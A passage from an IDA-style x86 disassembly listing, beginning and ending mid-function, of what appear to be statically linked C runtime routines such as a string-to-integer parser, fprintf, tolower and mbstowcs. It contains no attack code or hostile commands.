arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov [ebp+var_C], 0
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_41A894: ; CODE XREF: sub_41A870+77�j
cmp dword_442F58, 1
jle short loc_41A8B6
push 8
mov ecx, [ebp+var_8]
and ecx, 0FFh
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_18], eax
jmp short loc_41A8D0
; ---------------------------------------------------------------------------
loc_41A8B6: ; CODE XREF: sub_41A870+2B�j
mov edx, [ebp+var_8]
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8
mov [ebp+var_18], ecx
loc_41A8D0: ; CODE XREF: sub_41A870+44�j
cmp [ebp+var_18], 0
jz short loc_41A8E9
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_8], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_41A894
; ---------------------------------------------------------------------------
loc_41A8E9: ; CODE XREF: sub_41A870+64�j
movsx edx, byte ptr [ebp+var_8]
cmp edx, 2Dh
jnz short loc_41A90D
mov eax, [ebp+arg_C]
or al, 2
mov [ebp+arg_C], eax
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_41A927
; ---------------------------------------------------------------------------
loc_41A90D: ; CODE XREF: sub_41A870+80�j
movsx ecx, byte ptr [ebp+var_8]
cmp ecx, 2Bh
jnz short loc_41A927
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_8], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_41A927: ; CODE XREF: sub_41A870+9B�j
; sub_41A870+A4�j
cmp [ebp+arg_8], 0
jl short loc_41A939
cmp [ebp+arg_8], 1
jz short loc_41A939
cmp [ebp+arg_8], 24h
jle short loc_41A94E
loc_41A939: ; CODE XREF: sub_41A870+BB�j
; sub_41A870+C1�j
cmp [ebp+arg_4], 0
jz short loc_41A947
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov [edx], eax
loc_41A947: ; CODE XREF: sub_41A870+CD�j
xor eax, eax
jmp loc_41AB9D
; ---------------------------------------------------------------------------
loc_41A94E: ; CODE XREF: sub_41A870+C7�j
cmp [ebp+arg_8], 0
jnz short loc_41A98C
movsx ecx, byte ptr [ebp+var_8]
cmp ecx, 30h
jz short loc_41A966
mov [ebp+arg_8], 0Ah
jmp short loc_41A98C
; ---------------------------------------------------------------------------
loc_41A966: ; CODE XREF: sub_41A870+EB�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 78h
jz short loc_41A97C
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 58h
jnz short loc_41A985
loc_41A97C: ; CODE XREF: sub_41A870+FF�j
mov [ebp+arg_8], 10h
jmp short loc_41A98C
; ---------------------------------------------------------------------------
loc_41A985: ; CODE XREF: sub_41A870+10A�j
mov [ebp+arg_8], 8
loc_41A98C: ; CODE XREF: sub_41A870+E2�j
; sub_41A870+F4�j ...
cmp [ebp+arg_8], 10h
jnz short loc_41A9CB
movsx eax, byte ptr [ebp+var_8]
cmp eax, 30h
jnz short loc_41A9CB
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 78h
jz short loc_41A9B1
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 58h
jnz short loc_41A9CB
loc_41A9B1: ; CODE XREF: sub_41A870+134�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov cl, [eax]
mov byte ptr [ebp+var_8], cl
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_41A9CB: ; CODE XREF: sub_41A870+120�j
; sub_41A870+129�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov [ebp+var_10], eax
loc_41A9D6: ; CODE XREF: sub_41A870+26B�j
cmp dword_442F58, 1
jle short loc_41A9F7
push 4
mov eax, [ebp+var_8]
and eax, 0FFh
push eax
call sub_41E750
add esp, 8
mov [ebp+var_1C], eax
jmp short loc_41AA12
; ---------------------------------------------------------------------------
loc_41A9F7: ; CODE XREF: sub_41A870+16D�j
mov ecx, [ebp+var_8]
and ecx, 0FFh
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp+var_1C], eax
loc_41AA12: ; CODE XREF: sub_41A870+185�j
cmp [ebp+var_1C], 0
jz short loc_41AA24
movsx ecx, byte ptr [ebp+var_8]
sub ecx, 30h
mov [ebp+var_14], ecx
jmp short loc_41AA83
; ---------------------------------------------------------------------------
loc_41AA24: ; CODE XREF: sub_41A870+1A6�j
cmp dword_442F58, 1
jle short loc_41AA49
push 103h
mov edx, [ebp+var_8]
and edx, 0FFh
push edx
call sub_41E750
add esp, 8
mov [ebp+var_20], eax
jmp short loc_41AA66
; ---------------------------------------------------------------------------
loc_41AA49: ; CODE XREF: sub_41A870+1BB�j
mov eax, [ebp+var_8]
and eax, 0FFh
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 103h
mov [ebp+var_20], edx
loc_41AA66: ; CODE XREF: sub_41A870+1D7�j
cmp [ebp+var_20], 0
jz short loc_41AA81
movsx eax, byte ptr [ebp+var_8]
push eax
call sub_423D00
add esp, 4
sub eax, 37h
mov [ebp+var_14], eax
jmp short loc_41AA83
; ---------------------------------------------------------------------------
loc_41AA81: ; CODE XREF: sub_41A870+1FA�j
jmp short loc_41AAE0
; ---------------------------------------------------------------------------
loc_41AA83: ; CODE XREF: sub_41A870+1B2�j
; sub_41A870+20F�j
mov ecx, [ebp+var_14]
cmp ecx, [ebp+arg_8]
jb short loc_41AA8D
jmp short loc_41AAE0
; ---------------------------------------------------------------------------
loc_41AA8D: ; CODE XREF: sub_41A870+219�j
mov edx, [ebp+arg_C]
or edx, 8
mov [ebp+arg_C], edx
mov eax, [ebp+var_C]
cmp eax, [ebp+var_10]
jb short loc_41AAB3
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_10]
jnz short loc_41AAC2
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp [ebp+var_14], edx
ja short loc_41AAC2
loc_41AAB3: ; CODE XREF: sub_41A870+22C�j
mov edx, [ebp+var_C]
imul edx, [ebp+arg_8]
add edx, [ebp+var_14]
mov [ebp+var_C], edx
jmp short loc_41AACA
; ---------------------------------------------------------------------------
loc_41AAC2: ; CODE XREF: sub_41A870+234�j
; sub_41A870+241�j
mov eax, [ebp+arg_C]
or al, 4
mov [ebp+arg_C], eax
loc_41AACA: ; CODE XREF: sub_41A870+250�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp loc_41A9D6
; ---------------------------------------------------------------------------
loc_41AAE0: ; CODE XREF: sub_41A870:loc_41AA81�j
; sub_41A870+21B�j
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_C]
and edx, 8
test edx, edx
jnz short loc_41AB08
cmp [ebp+arg_4], 0
jz short loc_41AAFF
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41AAFF: ; CODE XREF: sub_41A870+287�j
mov [ebp+var_C], 0
jmp short loc_41AB7A
; ---------------------------------------------------------------------------
loc_41AB08: ; CODE XREF: sub_41A870+281�j
mov ecx, [ebp+arg_C]
and ecx, 4
test ecx, ecx
jnz short loc_41AB42
mov edx, [ebp+arg_C]
and edx, 1
test edx, edx
jnz short loc_41AB7A
mov eax, [ebp+arg_C]
and eax, 2
test eax, eax
jz short loc_41AB2F
cmp [ebp+var_C], 80000000h
ja short loc_41AB42
loc_41AB2F: ; CODE XREF: sub_41A870+2B4�j
mov ecx, [ebp+arg_C]
and ecx, 2
test ecx, ecx
jnz short loc_41AB7A
cmp [ebp+var_C], 7FFFFFFFh
jbe short loc_41AB7A
loc_41AB42: ; CODE XREF: sub_41A870+2A0�j
; sub_41A870+2BD�j
call sub_422F20
mov dword ptr [eax], 22h
mov edx, [ebp+arg_C]
and edx, 1
test edx, edx
jz short loc_41AB60
mov [ebp+var_C], 0FFFFFFFFh
jmp short loc_41AB7A
; ---------------------------------------------------------------------------
loc_41AB60: ; CODE XREF: sub_41A870+2E5�j
mov eax, [ebp+arg_C]
and eax, 2
test eax, eax
jz short loc_41AB73
mov [ebp+var_C], 80000000h
jmp short loc_41AB7A
; ---------------------------------------------------------------------------
loc_41AB73: ; CODE XREF: sub_41A870+2F8�j
mov [ebp+var_C], 7FFFFFFFh
loc_41AB7A: ; CODE XREF: sub_41A870+296�j
; sub_41A870+2AA�j ...
cmp [ebp+arg_4], 0
jz short loc_41AB88
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
loc_41AB88: ; CODE XREF: sub_41A870+30E�j
mov eax, [ebp+arg_C]
and eax, 2
test eax, eax
jz short loc_41AB9A
mov ecx, [ebp+var_C]
neg ecx
mov [ebp+var_C], ecx
loc_41AB9A: ; CODE XREF: sub_41A870+320�j
mov eax, [ebp+var_C]
loc_41AB9D: ; CODE XREF: sub_41A870+D9�j
mov esp, ebp
pop ebp
retn
sub_41A870 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABB0 proc near ; CODE XREF: sub_406614+4CE�p
; sub_40C50A+377D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_41A870
add esp, 10h
pop ebp
retn
sub_41ABB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABD0 proc near ; CODE XREF: sub_406614+4E�p
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_36 = dword ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_A = dword ptr -0Ah
var_6 = dword ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0D8h
lea eax, [ebp+var_24]
push eax
call ds:dword_494314
lea ecx, [ebp+var_10]
push ecx
call ds:dword_494420
mov edx, [ebp+var_6]
and edx, 0FFFFh
xor eax, eax
mov ax, word ptr dword_492088+2
cmp edx, eax
jnz short loc_41AC68
mov ecx, [ebp-8]
and ecx, 0FFFFh
xor edx, edx
mov dx, word ptr dword_492088
cmp ecx, edx
jnz short loc_41AC68
mov eax, [ebp+var_A]
and eax, 0FFFFh
xor ecx, ecx
mov cx, word_492086
cmp eax, ecx
jnz short loc_41AC68
mov edx, [ebp+var_10+2]
and edx, 0FFFFh
xor eax, eax
mov ax, word ptr dword_492080+2
cmp edx, eax
jnz short loc_41AC68
mov ecx, [ebp+var_10]
and ecx, 0FFFFh
xor edx, edx
mov dx, word ptr dword_492080
cmp ecx, edx
jnz short loc_41AC68
mov eax, dword_492078
mov [ebp+var_D8], eax
jmp loc_41ACF0
; ---------------------------------------------------------------------------
loc_41AC68: ; CODE XREF: sub_41ABD0+30�j
; sub_41ABD0+46�j ...
lea ecx, [ebp+var_D0]
push ecx
call ds:dword_49441C
mov [ebp+var_D4], eax
cmp [ebp+var_D4], 0FFFFFFFFh
jz short loc_41ACB8
cmp [ebp+var_D4], 2
jnz short loc_41ACAC
mov edx, [ebp+var_36]
and edx, 0FFFFh
test edx, edx
jz short loc_41ACAC
cmp [ebp+var_28], 0
jz short loc_41ACAC
mov [ebp+var_D8], 1
jmp short loc_41ACB6
; ---------------------------------------------------------------------------
loc_41ACAC: ; CODE XREF: sub_41ABD0+BB�j
; sub_41ABD0+C8�j ...
mov [ebp+var_D8], 0
loc_41ACB6: ; CODE XREF: sub_41ABD0+DA�j
jmp short loc_41ACC2
; ---------------------------------------------------------------------------
loc_41ACB8: ; CODE XREF: sub_41ABD0+B2�j
mov [ebp+var_D8], 0FFFFFFFFh
loc_41ACC2: ; CODE XREF: sub_41ABD0:loc_41ACB6�j
mov eax, [ebp+var_D8]
mov dword_492078, eax
mov ecx, [ebp+var_10]
mov dword_492080, ecx
mov edx, [ebp-0Ch]
mov dword ptr byte_492084, edx
mov eax, [ebp+var_A+2]
mov dword_492088, eax
mov ecx, [ebp+var_6+2]
mov dword_49208C, ecx
loc_41ACF0: ; CODE XREF: sub_41ABD0+93�j
mov edx, [ebp+var_D8]
push edx
mov eax, [ebp+var_18]
and eax, 0FFFFh
push eax
mov ecx, [ebp-1Ah]
and ecx, 0FFFFh
push ecx
mov edx, [ebp+var_1C]
and edx, 0FFFFh
push edx
mov eax, [ebp-1Eh]
and eax, 0FFFFh
push eax
mov ecx, [ebp+var_24+2]
and ecx, 0FFFFh
push ecx
mov edx, [ebp+var_24]
and edx, 0FFFFh
push edx
call sub_423ED0
add esp, 1Ch
mov [ebp+var_14], eax
cmp [ebp+arg_0], 0
jz short loc_41AD4A
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_41AD4A: ; CODE XREF: sub_41ABD0+170�j
mov eax, [ebp+var_14]
mov esp, ebp
pop ebp
retn
sub_41ABD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD60 proc near ; CODE XREF: sub_4084C8+8E�p
; sub_40C50A+2B37�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
mov [ebp+var_10], eax
loc_41AD6F: ; CODE XREF: sub_41AD60+37�j
cmp [ebp+arg_0], 0
jnz short loc_41AD93
push offset aStrNull ; "str != NULL"
push 0
push 38h
push offset aFprintf_c ; "fprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41AD93
int 3 ; Trap to Debugger
loc_41AD93: ; CODE XREF: sub_41AD60+13�j
; sub_41AD60+30�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41AD6F
loc_41AD99: ; CODE XREF: sub_41AD60+61�j
cmp [ebp+arg_4], 0
jnz short loc_41ADBD
push offset aFormatNull ; "format != NULL"
push 0
push 39h
push offset aFprintf_c ; "fprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41ADBD
int 3 ; Trap to Debugger
loc_41ADBD: ; CODE XREF: sub_41AD60+3D�j
; sub_41AD60+5A�j
xor edx, edx
test edx, edx
jnz short loc_41AD99
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
push ecx
call sub_421230
add esp, 4
mov edx, [ebp+var_4]
push edx
call sub_423FC0
add esp, 4
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_41EA90
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_424120
add esp, 8
mov edx, [ebp+var_4]
push edx
call sub_4212A0
add esp, 4
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41AD60 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
add eax, 20h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE40 proc near ; CODE XREF: sub_4099BC+6�p
; sub_4099DA+4A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_492170, 0
jnz short loc_41AE67
cmp [ebp+arg_0], 41h
jl short loc_41AE62
cmp [ebp+arg_0], 5Ah
jg short loc_41AE62
mov eax, [ebp+arg_0]
add eax, 20h
mov [ebp+arg_0], eax
loc_41AE62: ; CODE XREF: sub_41AE40+11�j
; sub_41AE40+17�j
mov eax, [ebp+arg_0]
jmp short loc_41AECF
; ---------------------------------------------------------------------------
loc_41AE67: ; CODE XREF: sub_41AE40+B�j
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_41AE99
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_4], 1
jmp short loc_41AEA0
; ---------------------------------------------------------------------------
loc_41AE99: ; CODE XREF: sub_41AE40+39�j
mov [ebp+var_4], 0
loc_41AEA0: ; CODE XREF: sub_41AE40+57�j
mov ecx, [ebp+arg_0]
push ecx
call sub_41AEE0
add esp, 4
mov [ebp+arg_0], eax
cmp [ebp+var_4], 0
jz short loc_41AEC1
push 13h
call sub_41BD30
add esp, 4
jmp short loc_41AECC
; ---------------------------------------------------------------------------
loc_41AEC1: ; CODE XREF: sub_41AE40+73�j
push offset dword_49274C
call ds:dword_494414
loc_41AECC: ; CODE XREF: sub_41AE40+7F�j
mov eax, [ebp+arg_0]
loc_41AECF: ; CODE XREF: sub_41AE40+25�j
mov esp, ebp
pop ebp
retn
sub_41AE40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AEE0 proc near ; CODE XREF: sub_41AE40+64�p
; sub_42F560+94�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp dword_492170, 0
jnz short loc_41AF0C
cmp [ebp+arg_0], 41h
jl short loc_41AF04
cmp [ebp+arg_0], 5Ah
jg short loc_41AF04
mov eax, [ebp+arg_0]
add eax, 20h
mov [ebp+arg_0], eax
loc_41AF04: ; CODE XREF: sub_41AEE0+13�j
; sub_41AEE0+19�j
mov eax, [ebp+arg_0]
jmp loc_41B007
; ---------------------------------------------------------------------------
loc_41AF0C: ; CODE XREF: sub_41AEE0+D�j
cmp [ebp+arg_0], 100h
jge short loc_41AF53
cmp dword_442F58, 1
jle short loc_41AF31
push 1
mov ecx, [ebp+arg_0]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_10], eax
jmp short loc_41AF45
; ---------------------------------------------------------------------------
loc_41AF31: ; CODE XREF: sub_41AEE0+3C�j
mov edx, [ebp+arg_0]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 1
mov [ebp+var_10], ecx
loc_41AF45: ; CODE XREF: sub_41AEE0+4F�j
cmp [ebp+var_10], 0
jnz short loc_41AF53
mov eax, [ebp+arg_0]
jmp loc_41B007
; ---------------------------------------------------------------------------
loc_41AF53: ; CODE XREF: sub_41AEE0+33�j
; sub_41AEE0+69�j
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_41AF9C
mov edx, [ebp+arg_0]
sar edx, 8
and edx, 0FFh
mov [ebp+var_8], dl
mov al, byte ptr [ebp+arg_0]
mov [ebp+var_7], al
mov [ebp+var_6], 0
mov [ebp+var_4], 2
jmp short loc_41AFAD
; ---------------------------------------------------------------------------
loc_41AF9C: ; CODE XREF: sub_41AEE0+98�j
mov cl, byte ptr [ebp+arg_0]
mov [ebp+var_8], cl
mov [ebp+var_7], 0
mov [ebp+var_4], 1
loc_41AFAD: ; CODE XREF: sub_41AEE0+BA�j
push 1
push 0
push 3
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+var_4]
push eax
lea ecx, [ebp+var_8]
push ecx
push 100h
mov edx, dword_492170
push edx
call sub_422F40
add esp, 20h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41AFE1
mov eax, [ebp+arg_0]
jmp short loc_41B007
; ---------------------------------------------------------------------------
loc_41AFE1: ; CODE XREF: sub_41AEE0+FA�j
cmp [ebp+var_4], 1
jnz short loc_41AFF1
mov eax, [ebp+var_C]
and eax, 0FFh
jmp short loc_41B007
; ---------------------------------------------------------------------------
loc_41AFF1: ; CODE XREF: sub_41AEE0+105�j
mov eax, [ebp+var_C]
and eax, 0FFh
mov ecx, [ebp+var_C+1]
and ecx, 0FFh
shl ecx, 8
or eax, ecx
loc_41B007: ; CODE XREF: sub_41AEE0+27�j
; sub_41AEE0+6E�j ...
mov esp, ebp
pop ebp
retn
sub_41AEE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B010 proc near ; CODE XREF: sub_40A359+3F�p
; sub_40A42B+27�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
mov eax, [ebp+arg_0]
push eax
call sub_416A60
add esp, 8
pop ebp
retn
sub_41B010 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B030 proc near ; CODE XREF: sub_40AD78+55�p
; sub_413B31+236�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41B03A: ; CODE XREF: sub_41B030+1F�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
test edx, edx
jz short loc_41B051
jmp short loc_41B03A
; ---------------------------------------------------------------------------
loc_41B051: ; CODE XREF: sub_41B030+1D�j
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
sar eax, 1
sub eax, 1
mov esp, ebp
pop ebp
retn
sub_41B030 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B060 proc near ; CODE XREF: sub_40AD78+19�p
; sub_40AD78+49�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_41B098
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_4], 1
jmp short loc_41B09F
; ---------------------------------------------------------------------------
loc_41B098: ; CODE XREF: sub_41B060+18�j
mov [ebp+var_4], 0
loc_41B09F: ; CODE XREF: sub_41B060+36�j
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_41B0E0
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jz short loc_41B0C8
push 13h
call sub_41BD30
add esp, 4
jmp short loc_41B0D3
; ---------------------------------------------------------------------------
loc_41B0C8: ; CODE XREF: sub_41B060+5A�j
push offset dword_49274C
call ds:dword_494414
loc_41B0D3: ; CODE XREF: sub_41B060+66�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_41B060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0E0 proc near ; CODE XREF: sub_41B060+4B�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_4], 0
cmp [ebp+arg_0], 0
jz short loc_41B103
cmp [ebp+arg_8], 0
jnz short loc_41B103
xor eax, eax
jmp loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B103: ; CODE XREF: sub_41B0E0+14�j
; sub_41B0E0+1A�j ...
cmp [ebp+arg_4], 0
jnz short loc_41B127
push offset aSNull ; "s != NULL"
push 0
push 55h
push offset aMbstowcs_c ; "mbstowcs.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41B127
int 3 ; Trap to Debugger
loc_41B127: ; CODE XREF: sub_41B0E0+27�j
; sub_41B0E0+44�j
xor eax, eax
test eax, eax
jnz short loc_41B103
cmp [ebp+arg_0], 0
jz loc_41B276
cmp dword_492170, 0
jnz short loc_41B189
loc_41B140: ; CODE XREF: sub_41B0E0+9F�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_8]
jnb short loc_41B181
mov edx, [ebp+arg_4]
add edx, [ebp+var_4]
movzx ax, byte ptr [edx]
mov ecx, [ebp+arg_0]
mov [ecx], ax
mov edx, [ebp+arg_4]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_41B16D
mov eax, [ebp+var_4]
jmp loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B16D: ; CODE XREF: sub_41B0E0+83�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
add edx, 2
mov [ebp+arg_0], edx
jmp short loc_41B140
; ---------------------------------------------------------------------------
loc_41B181: ; CODE XREF: sub_41B0E0+66�j
mov eax, [ebp+var_4]
jmp loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B189: ; CODE XREF: sub_41B0E0+5E�j
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
push 0FFFFFFFFh
mov edx, [ebp+arg_4]
push edx
push 9
mov eax, dword_492180
push eax
call ds:dword_4942D4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41B1B9
mov eax, [ebp+var_4]
sub eax, 1
jmp loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B1B9: ; CODE XREF: sub_41B0E0+CC�j
call ds:dword_4942F0
cmp eax, 7Ah
jz short loc_41B1D7
call sub_422F20
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B1D7: ; CODE XREF: sub_41B0E0+E2�j
mov ecx, [ebp+arg_8]
mov [ebp+var_10], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
jmp short loc_41B1EE
; ---------------------------------------------------------------------------
loc_41B1E5: ; CODE XREF: sub_41B0E0:loc_41B22F�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_41B1EE: ; CODE XREF: sub_41B0E0+103�j
mov ecx, [ebp+var_10]
mov edx, [ebp+var_10]
sub edx, 1
mov [ebp+var_10], edx
test ecx, ecx
jz short loc_41B231
mov eax, [ebp+var_8]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_41B231
mov edx, [ebp+var_8]
xor eax, eax
mov al, [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_41B22F
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_41B22F: ; CODE XREF: sub_41B0E0+144�j
jmp short loc_41B1E5
; ---------------------------------------------------------------------------
loc_41B231: ; CODE XREF: sub_41B0E0+11C�j
; sub_41B0E0+127�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+arg_4]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_4]
push edx
push 1
mov eax, dword_492180
push eax
call ds:dword_4942D4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41B271
call sub_422F20
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B271: ; CODE XREF: sub_41B0E0+17F�j
mov eax, [ebp+var_4]
jmp short loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B276: ; CODE XREF: sub_41B0E0+51�j
cmp dword_492170, 0
jnz short loc_41B28D
mov ecx, [ebp+arg_4]
push ecx
call sub_418E70
add esp, 4
jmp short loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B28D: ; CODE XREF: sub_41B0E0+19D�j
push 0
push 0
push 0FFFFFFFFh
mov edx, [ebp+arg_4]
push edx
push 9
mov eax, dword_492180
push eax
call ds:dword_4942D4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41B2BE
call sub_422F20
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41B2C4
; ---------------------------------------------------------------------------
loc_41B2BE: ; CODE XREF: sub_41B0E0+1CC�j
mov eax, [ebp+var_4]
sub eax, 1
loc_41B2C4: ; CODE XREF: sub_41B0E0+1E�j
; sub_41B0E0+88�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41B0E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B2D0 proc near ; CODE XREF: sub_41B970+D2�p
push ebp
mov ebp, esp
cmp off_442C38, 0
jz short loc_41B2E2
call off_442C38
